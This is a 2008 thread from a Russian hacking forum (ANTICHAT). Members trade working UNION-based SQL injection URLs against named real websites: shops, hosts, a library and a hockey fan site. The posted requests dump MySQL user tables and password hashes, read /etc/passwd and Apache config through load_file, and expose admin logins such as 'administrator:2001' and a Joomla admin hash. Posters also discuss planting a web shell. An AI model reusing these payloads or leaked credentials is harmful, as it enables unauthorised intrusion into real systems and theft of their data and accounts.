ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.03.2008, 06:12
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
http:// www.pconsult.dp.ua/index.php?pn=-99999+union+select+1,2,3,concat_ws(0x3a,user(),ver sion(),database()),5/*
USER: pconsult_user@localhost
VERSION: 4.1.21-standard-log
DATABASE: pconsult_db
Таблы так и не нашел 
Кто найдет - отпишитесь. |
|
|
17.03.2008, 12:10
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
www.getethical.com
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,version(),3,4,5/*
Доступ к mysql.user
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,concat_ws(0x3a,user,password,host),3,4,5+from+mysql.user/*
- Рут без пароля, однако подключение только с локалхоста. Хотя существует юзер: leith:663ebe8f58ee1b6c:% - откуда угодно - но учитывая желание залить шелл - не интересно 
file_priv=Y
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,file_priv,3,4,5+from+mysql.user+where+user=left(user(),locate(0x40,user())-1)/*
/etc/passwd
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/passwd'),3,4,5/*
И кавычки не экранируются=) кажется можно попробовать залить шелл.
httpd.conf
Код:
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5+from+mysql.user/*
Однако папочки /var/www/getethical/public_html/ не нашлось(((( Может кто-то подкажет где можно посмотреть полный путь к сайту?
Ну и напоследок - есть интересная таблица customers
Последний раз редактировалось Dima-k17; 17.03.2008 в 12:13..
|
|
|
|
17.03.2008, 12:21
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Dima-k17
всё бы хорошо ,но это баян
_http://forum.antichat.ru/showpost.php?p=287675&postcount=501
|
|
|
|
17.03.2008, 12:49
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
Сообщение от jokester
Dima-k17
всё бы хорошо ,но это баян
_http://forum.antichat.ru/showpost.php?p=287675&postcount=501
Сорри, смотрел тут, не нашел, посему и запостил:
http://filefront.jino-net.ru/sql.html
Однако у него без file_priv'a :-)
исправляюсь:
Код:
http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,table_name,22+from+information_schema.tables+limit+0,1/*
|
|
|
|
17.03.2008, 13:36
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Горе-кодеры
Код:
http://valera.asf.ru/perl/cookbook/cont.php?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/*
|
|
|
|
18.03.2008, 03:44
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Парочка хостеров:
Ни у кого там сайтов нет ? 
Этот смешной, там чудо защита какая-то,по ходу на скобки пишет: "I don't like you...", можно подумать я в восторге
_http://fairhost.ru/article.php?sid=-13+union+select+1,2,3,4,5,6,7,8,@@version,0,11/*
4.0.27-max-log
-------------------------------------
_http://www.alestar.biz/index.php?id1=5+and+1=2+union+select+1,2,concat(us er(),char(58),version(),char(58),database()),4,5,6/*
alesta_ya@localhost:4.1.22:alesta_db1
вывод в исходник
--------------------------------------
Таблицы не подобрал |
|
|
|
18.03.2008, 04:05
|
|
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338
Репутация:
165
|
|
http://library.informdon.ru/
Код:
http://library.informdon.ru/?p=4&sp=32&tp=2345432+union+select+0,pass,2,3,4,5,6,name+from+admin
administrator:2001
Код:
http://informdon.ru/library/admin/
OS :Windows NT A10 5.2 build 3790
там загрузка файла тоже есть имхо |
|
|
|
18.03.2008, 16:14
|
|
Участник форума
Регистрация: 23.07.2007
Сообщений: 100
Провел на форуме:
620976
Репутация:
52
|
|
Код:
http://www.rogerssprayers.com/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
admin:3ff9f71df33fff2b789abc66f564a708
|
|
|
|
18.03.2008, 16:58
|
|
Новичок
Регистрация: 19.02.2008
Сообщений: 4
Провел на форуме:
23616
Репутация:
6
|
|
Белорусский сайт любителей хоккея.
http://www.belarushockey.com/?commid=-2141'+union+select+1,2,3,concat_ws(char(35),versio n(),database(),user())/*
4.0.24_Debian-10sarge1-log #belarushockeycom #belarushockeycom@localhost
http://www.belarushockey.com/?commid=-2141'+union+select+1,nick,mail,message+from+commen t/*
http://www.belarushockey.com/?commid=-2141'+union+select+1,author,title,text+from+news+w here+id=2142/* |
|
|
|
18.03.2008, 23:11
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154
Репутация:
126
|
|
когдато тоже ломал сайт этот
|
|
|
|
|
 |
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Комбинированный вид
